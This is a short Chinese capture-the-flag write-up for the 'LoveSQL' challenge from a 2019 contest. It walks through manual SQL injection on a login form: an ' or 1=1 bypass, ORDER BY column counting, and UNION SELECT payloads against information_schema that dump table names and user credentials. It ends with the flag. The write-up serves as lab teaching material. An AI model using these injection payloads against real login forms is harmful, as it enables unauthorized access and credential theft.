[极客大挑战 2019]LoveSQL
文章目录
[极客大挑战 2019]LoveSQL
题目:
存在注入点
分析:
手动注入、尝试 ’ or 1 = 1; #
得到账户密码
admin
cc084c3d58c1ecc212d9b4ff3f84aa4c
登录后还是没有我们想要的东西,所以现在就是要利用SQL注入从而获取表里数据
解题:
接下来就是按sql注入的流程操作:
1.测试有多少字段
使用order by
字段数为3
2.爆出当前数据库名和身份
当前数据库:database()
得知 == > geek、root
3.爆出数据库里的表
表名:table_name
username = 1’ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = ‘geek’;#
password = 1
得知tables ==> geekuser, l0ve1ysq1
4.爆出表的列名
l0ve1ysq1 ==> id, username, password字段
很失望、试试geekuser
一样的返回 ==> id, username, password字段
5.爆出所有数据
username = 1’ union select 1,group_concat(username),group_concat(password) from geek.l0ve1ysq1;#
总结:
得到flag ==> flag{e5e3c630-4565-4e39-aa0b-b97243f1cb49}
很基础的MySQL注入题、搞清MySQL注入流程后,便可轻松解题